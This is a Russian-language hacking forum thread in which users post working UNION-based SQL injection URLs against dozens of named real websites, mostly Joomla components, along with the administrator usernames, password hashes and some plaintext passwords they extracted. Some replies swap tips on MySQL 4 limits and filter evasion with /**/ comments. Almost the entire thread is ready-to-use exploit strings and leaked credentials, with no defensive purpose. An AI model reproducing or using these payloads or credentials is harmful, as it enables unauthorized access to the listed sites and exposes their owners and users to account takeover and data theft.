SQL Инъекции

Ты бы лучше не советы давал, а мануалы почитал бы:

Code:

http://www.webmarket.mobi/wm.php?id=-3+union+select+1,aes_decrypt(aes_encrypt(concat(admin_login,char(58),admin_password),0x71),0x71),3,4,5,6+from+admin_settings/*

 

Code:

http://www.intergy.ca/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),userna
me,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0
,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=86

admin:c74c6ca9af4e07d395d15bdd461c1985

Code:

http://www.administrationnetwork.ca/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,
101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,
333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=36

admin:53f580fcae1d2f3ffa1cbbb4493b5142

Code:

http://www.recruitingsales.com/index.php?option=com_neorecruit&task=offer_vie
w&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,5
8),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,
444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=26

admin:93e3b04e8c37f439047122606d4b8e56

Code:

http://www.femstudent.nl/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=33

admin:14aeedbb91b2674adfae0c33edb93f3b

Code:

http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=27

rhcomm:dde29cf6540fb2d19735874bbe1b075d:nZU2ch2im8VZIWVd

Code:

http://www.coordination-nationale-infirmiere.org/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=98

adminsjuilla:6e2f7fa24b775562fc88d8f9a5d76573

Code:

http://www.nounouchelanou.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=18

admin:6d9556fe5e923f525bd376b5269318b4

Code:

http://www.dentalservicesagency.ie/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=26

admin:b664b357e56de3ceb408cec88e646247

Code:

http://www.utahstateonline.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=29

hankhill:1e8e222a26a62564a467499b0e12e94e

 

Code:

http://www.symbianone.com/index.php?option=com_remository&Itemid=75&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

Code:

http://www.lbszone.com/index.php?option=com_remository&Itemid=28&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

Code:

http://www.plogue.com/index.php?option=com_remository&Itemid=31&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

Code:

http://www.gisuser.com/index.php?option=com_remository&Itemid=105&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

Code:

http://www.chernozemie-inteko.ru/index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*&Itemid=77

Code:

http://www.mrtt.pmis.gov.mn/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=45

Code:

http://farmmonitordb.net/cms/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=26

Code:

http://www.vanbuurenestates.co.za/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=89

Code:

http://www.savingbaily.com/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=34

 

http://www.thehopeless.net/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*&pg=1

Дальше сами копайте ))

 

а можно еще и так

Code:

http://www.webmarket.mobi/wm.php?id=-3+union+select+1,convert(concat(admin_login,char(58),admin_password),binary),3,4,5,6+from+admin_settings/*

 

Code:

http://www.vortex-club.com/cms/index.php?option=com_eventlist&Itemid=99999999&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*

admin:2c019e4d345e0e2693af848183c8654a

Code:

http://www.rabota.su/info/makebiz/index.php?id=-1+union+select+user(),2/*

Code:

http://www.clubtour.su/tourinfo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

 

sql

вот нормальный вывод

 

http://www.st-johns-school.org.uk/index.php?inc=999+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Что-то старею что-ли, но таблицу подобрать не могу... НЕЛР

Кстати такая бага встречается во многих сайтах, типа из бд выбирается имя файла, и инъекция)))

 

Code:

http://www.lrvk.gov.lv/page.php?id=-1+union+select+1,2,3,4,username,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users/*

admin:6cb062ad1d75b703

 

username: admin
password - md5: aa874813a18b5048770d683a51b8b342

username: sachin
password - md5: aa874813a18b5048770d683a51b8b342

username: admin
password - md5: 65f03ae284e333b7d4097d532fdf4045

username: fableman
password - md5: 50432ac5a54b03b3a5c24b2d0de82f84

username: ADMIN
password - md5: 3820544b8ed2b76f81ba8a234f7c0a6d

Слишком много юзеров ...

username: setrpc
password: planning

username: volunteer1
password: iamone

username: gail
password: miser

Слишком много юзеров ...

 

.edu

www.hec.edu

Code:

http://www.hec.edu/hec/eng/professeurs_recherche/p_liste/p_bio.php?num=-92+union+select+1,2,3,4,convert(concat(version(),0x3a,user(),0x3a,database()),binary),6,7/*

version: 4.1.11-Debian_4-log
user: hec_profs@localhost
db: hec_profs_recherche

www.law.gmu.edu

Code:

http://www.law.gmu.edu/academics/course_detail.php?num=-177+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10/*

version: 4.0.13-log
user: lawSelect@localhost
db: Courses

 

username: admin
password - md5: 482d8830c76ce67c975ab46ff3ba5d06

username: admin
password - md5: 529b0ab29f005d89132fa6ce4df3b0dd

username: admin
password - md5: ca7962a267407927e34b1aeed06a3cb0

username: jtwist
password - md5: 14969f34049e464f88d02bd075cdcf2c

username: admin
password - md5: 0c493157cc274bb698dada25a92b06a6

username: admin
password - md5: bdcb268b0facd7d6b24c0d39091be524

username: admin
password - md5: 8ce83701c7e38f2e96f7f6bb2825b0b4

username: admin
password - md5: ded7d59e7ae3d9d77a6726f1f5dc8771

username: admin
password - md5: 69c3dab74972313bb8ad3ec437014aa0

 

Code:

http://property.offshore-manual.ru/index.php?option=com_gmaps&task=viewmap&Itemid=86&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:aaa86f62472c97f82be7a20373c5faf5

Code:

http://www.popiteru.ru/index.php?option=com_gmaps&task=viewmap&Itemid=8&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

fredi:cdfba41d8d0f3f466bcdac7562153620

Code:

http://golf.gr/index.php?option=com_gmaps&task=viewmap&Itemid=1&mapId=-1/**/union/**/select/**/0,password,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:7946848d74345f8b1601419267bc46a0:sgGX9fKiTQKUc24D

Code:

http://www.ttclubs.com/index.php?option=com_gmaps&task=viewmap&Itemid=3&mapId=-1/**/union/**/select/**/0,password,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:50deaf76906c4b018bb8671621976014

Code:

http://turnersimscouk.pre-dns-change.com/index.php?option=com_gmaps&task=viewmap&Itemid=54&mapId=-1/**/union/**/select/**/0,1,username,3,4,5,6,7,8/**/from/**/jos_users/*

admin:b6ba6f629e24ada12521da3313385d21

Code:

http://www.srkengineering.com.au/index.php?option=com_gmaps&task=viewmap&Itemid=21&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:4a50a931db0de18a8e299cea8c462277

Code:

http://www.dpsnc.net/Guatemala/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:11c1066dde013e2cd20932d053ef895c

Code:

http://www.melplashshow.co.uk/?option=com_gmaps&task=viewmap&Itemid=38&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:f5091ef24d4d9f56b36750957b6fa616

Code:

http://www.aysoareag.org/index.php?option=com_gmaps&task=viewmap&Itemid=69&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:fcf337650b59ce188612847cbc0f885c:AwyDiAKPawhAsgF8

Code:

http://www.shipcreeksalmonderby.com/index.php?option=com_gmaps&task=viewmap&Itemid=28&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

cadguy:bde1cf25419a99580b47bb0f23268d25

Code:

http://tucepi-apartments.com/index.php?option=com_gmaps&task=viewmap&Itemid=42&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:48a53d5b1db6d3d13f6749e05cba00ae

Code:

http://www.exmouthonline.com/index.php?option=com_gmaps&task=viewmap&Itemid=67&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:f75fa350c0b642b05ce2b22223760c71

Code:

http://lcsa.info/index.php?option=com_gmaps&task=viewmap&Itemid=49&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

TenX:8f6add1ee934dacc262e369a8403d08e

Code:

http://www.mightycity.co.uk/index.php?option=com_gmaps&task=viewmap&Itemid=5&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:b6450e32a9efc7f172d49a57fd570fbd

Code:

http://www.jemburtigny.ch/index.php?option=com_gmaps&task=viewmap&Itemid=99&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:1a1dc91c907325c69271ddf0c944bc72

Code:

http://www.global-resources.co.uk/content/index.php?option=com_gmaps&task=viewmap&Itemid=46&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

1a1n5adm1nAcc0unt:63c59ca1a431d10c2f3687216350d6a7

Code:

http://www.sportzone.org.nz/index.php?option=com_gmaps&task=viewmap&Itemid=374&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:7235d5430129327c4bb96062bb5ce6bd

Code:

http://www.cateandsally.com/index.php?option=com_gmaps&task=viewmap&Itemid=35&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:b266d4f01cb077a11dd62e46302d27de

Code:

http://www.yumyummap.com/san_francisco/index.php?option=com_gmaps&task=viewmap&Itemid=17&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

colin.pantin:bc6f70c347db763a83b4b4be0ac1f222:epi51i3ITlVLHFwk

Code:

http://www.bwtc.com/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:694f33456eab7e8665bca258a6aca942

Code:

http://www.digestcommunity.net/index.php?option=com_gmaps&task=viewmap&Itemid=76&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

digestedadmin:fc2d1e75174ff5d93d8aa7dba4b53590

Code:

http://stjamesepiscopal.info/index.php?option=com_gmaps&task=viewmap&Itemid=42&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

hbaker:23245cbfa834b21e1208b7b7c0cbb130

Code:

http://lisbon.directrouter.com/~crystalf/index.php?option=com_gmaps&task=viewmap&Itemid=36&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

Shaun Anderson:6e9c4948c7f04aeb5556575fd2d56487

Code:

http://www.ifactory.com.au/index.php?option=com_gmaps&task=viewmap&Itemid=93&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:863c0c12916237790b8b9f5b719bad2b

Code:

http://sierraapplefestival.com/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:9b2e1b7883b38f7b6ed478ebc26b3655

Code:

http://www.islengineering.com/index.php?option=com_gmaps&task=viewmap&Itemid=104&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

islengin:033f123b9e92e3d5dcef9b84bebd2189

Code:

http://www.texanstalk.com/index.php?option=com_gmaps&task=viewmap&Itemid=3&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:a9ff7154aea384f303e20aef3a1c187e

Code:

http://avonpd.com/index.php?option=com_gmaps&task=viewmap&Itemid=35&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

avonpdco:d46cb1ca6bd45a378db30d1a680e27bb

Code:

http://www.intemo.com/index.php?option=com_gmaps&task=viewmap&Itemid=32&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:48c50c33e87aaec5dee39606f60bf8dayvCnXD0hUzEUXNR

Code:

http://northwalesclimbers.co.uk/index.php?option=com_gmaps&task=viewmap&Itemid=80&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

admin:9224860eb0eeea71e76f7471d11d2aed

Code:

http://www.kitemed.com/2/index.php?option=com_gmaps&task=viewmap&Itemid=82&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*&Itemid=81

admin:4b16650d001fd94c0e8e9162bca51447

Code:

http://www.worleylaw.com/index.php?option=com_gmaps&task=viewmap&Itemid=118&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

Nickolai:f43332752bcd5e7e72d799fa176e065b

 

Информация о колонках и таблицах не выводится,или я ошибаюсь?


Код:


http://www.flirtanica.ru/articles1.php?id=-89+UNION+SELECT+1,CONCAT(VERSION(),0x3a,USER(),0x3a,DATABASE()),3,4,5/*



выдает ошибку: error:1044 Access denied for user 'flirtani'@'%' to database 'INFORMATION_SCHEMA'

 

1) Юзай антибоян: http://antiboyansql.narod.ru/sql.txt

2) Версия мускула здесь 4, а значит что тут нету таблиц information_schema.tables и information_schema_columns

Очень тебе советую почитать побольше статей и мануалов.

3) На будующее эта тема не для вопросов, флейм, не раскрученные скули и т.д. будут удаляться.

 

Code:

http://www.bluebit.com.au/cms.php?id=-6+union+select+1,VERSION(),3/*

 

http://znakomstva.nu/metro.php?st=-1+union+select+1,concat(login,0x26,password),3+from+members/*
admin - 13061973
все пароли в открытом виде
да еще и мускул 5)
вам какой секс? классика? мадомаза? )) - на сайт зайдете - поймете меня )

 

http://www.zdv.ru/include/gallery.php?item=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14,15,16,17,18,version(),password,21+from+users+limit+4,2/*
журнал какойто - типа эротический...непомню)
мускул 4 - и пара траблов
Таблицу юзерс нашел - в ней есть колумн пассворд а какой колумн логин держит не нашел))
+ ни один хеш расколоть не смог...

 

ыгы ыгы...Тыбы статьи почитал а?
http://www.softp.ru/?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17/*
Во первых - с чего ты взял что полей 10 во вторых с чего ты взял что там есть таблица мемберс?Или тебя плющит потому что ночь?Ты может выпил?
СТАТЬИ ЧИТАААААТЬ (юзай поиск и найдешь их на а-чате)
там еще бд мускул 4 - так что геморой с таблицами оставил тебе....

 

4 версия